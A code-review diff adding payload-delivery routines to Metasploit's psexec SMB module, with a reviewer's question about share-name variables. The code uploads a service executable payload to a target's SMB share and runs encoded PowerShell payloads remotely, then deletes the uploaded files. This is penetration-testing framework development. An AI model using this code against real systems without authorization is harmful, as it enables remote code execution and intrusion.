lib/msf/core/exploit/smb/client/psexec.rb

```diff
@@ -193,6 +196,247 @@ def psexec(command, disconnect=true)
+)} from the target.")
+      return
+    end
+    print_status("Executing cleanup...")
+    files.each do |file|
+      begin
+        smb_file_rm(file)
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
+        print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
+      end
+    end
+    left = files.collect{ |f| smb_file_exist?(f) }
+    if left.any?
+      print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
+    else
+      print_good("Cleanup was successful")
+    end
+  end
+
+    def execute_powershell_payload
+    ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+    end
+
+    # Execute the powershell command
+    print_status("Executing the payload...")
+    begin
+      psexec(command)
+    rescue StandardError => exec_command_error
+      fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+    end
+  end
+
+  def native_upload(smb_share)
+    filename = "#{rand_text_alpha(8)}.exe"
+    servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
+    serviceencoder = ''
+
+    # Upload the shellcode to a file
+    print_status("Uploading payload...")
+    smbshare = smb_share
+    fileprefix = ""
+    # if SHARE = Users/sasha/ or something like this
+    if smbshare =~ /.[\\\/]/
+      subfolder = true
+      smbshare = smb_share.dup
+      smbshare = smbshare.gsub(/^[\\\/]/,"")
+      folder_list = smbshare.split(/[\\\/]/)
+      smbshare = folder_list[0]
+      fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
+    else
+      subfolder = false
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{filename}", 'rwct')
+    end
+    exe = ''
+    opts = { :servicename => servicename, :serviceencoder => serviceencoder}
+    begin
+      exe = generate_payload_exe_service(opts)
+
+      fd << exe
+    ensure
+      fd.close
+    end
+
+    if subfolder
+      print_status("Created \\#{fileprefix}\\#{filename}...")
+    else
+      print_status("Created \\#{filename}...")
+    end
+
+    # Disconnect from the share
+    simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+
+    # define the file location
+    if smb_share == 'ADMIN$'
+      file_location = "%SYSTEMROOT%\\#{filename}"
+    elsif smb_share =~ /^[a-zA-Z]\$$/
+      file_location = smb_share.slice(0,1) +  ":\\#{filename}"
```

Comment:
Should this set of `if` statements use `smb_share` as provided by the caller or local `smbshare` as generated earlier in the method?